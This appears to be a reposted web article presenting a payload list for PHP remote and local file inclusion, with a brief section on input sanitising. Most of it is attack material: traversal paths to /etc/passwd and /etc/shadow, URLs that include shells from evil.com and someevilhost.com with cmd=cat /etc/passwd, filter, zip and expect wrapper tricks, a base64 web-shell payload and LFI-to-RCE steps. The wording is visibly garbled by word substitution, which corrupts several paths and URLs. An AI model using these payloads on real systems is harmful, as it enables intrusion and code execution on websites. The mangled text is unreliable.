RFI/LFI Payload List

RFI/LFI Payload List

As with many exploits, distant and community file inclusions are only a issue at the close of the encoding. Of program, it takes a 2nd man or woman to have it. Now, this report will ideally give you an thought of defending your internet site and most importantly your code from a file inclusion exploit. I’ll give code illustrations in PHP format.

Let us seem at some of the code that tends to make RFI / LFI exploits attainable.

 Information 

Now of course this should really not be made use of. The $ webpage entry is not fully cleared. $ site input is directed instantly to the damn net webpage, which is a large “NO”. Generally take away any enter passing by the browser. When the consumer clicks on “File” to go to “files.php” when he visits the world-wide-web website page, a thing like this will appear.

http: //localhost/index.php? web page = files.php

Now if no a single has cleared the enter in the $ site variable, we can have it pointed to what we want. If hosted on a Unix / Linux server, we can exhibit the password as configuration files for shaded or uncleaned variable enter.

Viewing documents on the server is a “Local File Inclusion” or LFI exploit. This is no even worse than an RFI exploit.

http: //localhost/index.php? webpage = .. / .. / .. / .. / .. / .. / and many others / passwd

The code will almost certainly return to / and so on / passwd. Now let’s look at the RFI component of this exploit. Let’s get some of the codes we’ve taken prior to.

 Documents 

Now suppose we write a little something like …

http: //localhost/index.php? web page = http: //google.com/

Probably where the $ web page variable was initially placed on the website page, we get the google.com homepage. This is where the codder can be damage. We all know what c99 (shell) can do, and if coders are careful, they could be incorporated in the web site, enabling people to surf by way of delicate files and contacts at the appropriate time. Let’s search at a thing less difficult that can take place on a web website page. The quicker and much more soiled use of RFI exploitation is to your advantage. Now, develop a file named “test.php” and put the pursuing code in it, and help you save it.




Now, this file is some thing you can use to your gain to include it on a site with RFI exploitation. The passthru () command in PHP is incredibly evil, and many hosts contact it “out of company for protection reasons”. With this code in take a look at.php, we can send out a request to the world wide web site, which include file inclusion exploit.

http: //localhost/index.php? web page = http: //someevilhost.com/check.php

When the code will make a $ _GET request, we should give a command to go to passthru (). We can do some thing like this.

http: //localhost/index.php? web page = http: //someevilhost.com/test.php? cmd = cat / and many others / passwd

This unix machine will also extract the file / and so forth / passwd making use of the cat command. Now we know how to exploit RFI exploit, now we need to have to know how to maintain it and make it extremely hard for any person to execute the command, and how to include things like distant webpages on your server. 1st, we can disable passthru (). But just about anything on your web page can use it again (ideally not). But this is the only issue you can do. I recommend cleansing the inputs as I said before. Now, instead of just passing variables directly to the webpage, we can use a number of PHP-proposed constructions in just features. To begin with, chop () from perl was adapted to PHP, which gets rid of whitespaces from an array. We can use it like this.

 Files 

There are a lot of functions that can distinct string. htmlspecialchars () htmlentities (), stripslashes () and much more. In conditions of confusion, I like to use my individual functions. We can do a perform in PHP that can very clear every little thing for you, in this article I have organized some thing effortless and quick about this class for you.


Now I hope you can see what is likely on within this purpose, so you can insert yours. I would counsel using the str_swap () purpose and there are a ton of other features to very clear them. Be considerate and stop the RFI & LFI exploit frenzy!

Essential LFI (null byte, double encoding, and other methods) :

http://case in point.com/index.php?site=and so forth/passwd
http://case in point.com/index.php?site=etcetera/passwd%00
http://instance.com/index.php?web page=../../etc/passwd
http://illustration.com/index.php?website page=%252e%252e%252f
http://instance.com/index.php?web site=....//....//and many others/passwd

Interesting data files to examine out :

/and so forth/difficulty
/and many others/passwd
/and so forth/shadow
/and so forth/team
/etc/hosts
/etcetera/motd
/and many others/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]*   (initially range is the PID, second is the filedescriptor)
/proc/self/approximativement
/proc/edition
/proc/cmdline

Essential RFI (null byte, double encoding, and other tricks) :

http://illustration.com/index.php?page=http://evil.com/shell.txt
http://example.com/index.php?site=http://evil.com/shell.txt%00
http://case in point.com/index.php?web page=http:%252f%252fevil.com%252fshell.txt

LFI / RFI Wrappers :

LFI Wrapper rot13 and foundation64 – php://filter situation insensitive.

http://case in point.com/index.php?webpage=php://filter/study=string.rot13/source=index.php
http://illustration.com/index.php?website page=php://filter/convert.base64-encode/useful resource=index.php
http://example.com/index.php?web site=pHp://FilTer/change.foundation64-encode/resource=index.php

Can be chained with a compression wrapper.
http://instance.com/index.php?web site=php://filter/zlib.deflate/convert.foundation64-encode/resource=/and many others/passwd

LFI Wrapper ZIP :

echo "

" > payload.php
zip payload.zip payload.php
mv payload.zip shell.jpg
rm payload.php

http://case in point.com/index.php?site=zip://shell.jpg%23payload.php

RFI Wrapper Details with “” payload :

http://example.web/?site=data://textual content/plainbase64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=

RFI Wrapper Count on :

http://case in point.com/index.php?webpage=php:count on://id
http://instance.com/index.php?page=php:expect://ls

XSS by means of RFI/LFI with “” payload :

http://example.com/index.php?web site=information:software/x-httpd-phpbase64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+

LFI to RCE via /proc/*/fd :

  1. Add a lot of shells (for case in point: 100)
  2. Include things like http://instance.com/index.php?page=/proc/$PID/fd/$FD with $PID = PID of the process (can be bruteforced) and $FD the filedescriptor (can be bruteforced much too)

LFI to RCE via Upload :

http://example.com/index.php?web site=path/to/uploaded/file.png

References :

Screening for Nearby File Inclusion

👉 Wikipedia

👉 Distant File Inclusion

👉 Wikipedia: “Distant File Inclusion”

👉 PHP File Inclusion

The publish RFI/LFI Payload Listing appeared first on Hakin9 – IT Safety Journal.

Picture and Short article Source hyperlink

Browse Far more on Pentesting Applications

You may also like...

Leave a Reply

Your email address will not be published. Required fields are marked *

%d bloggers like this: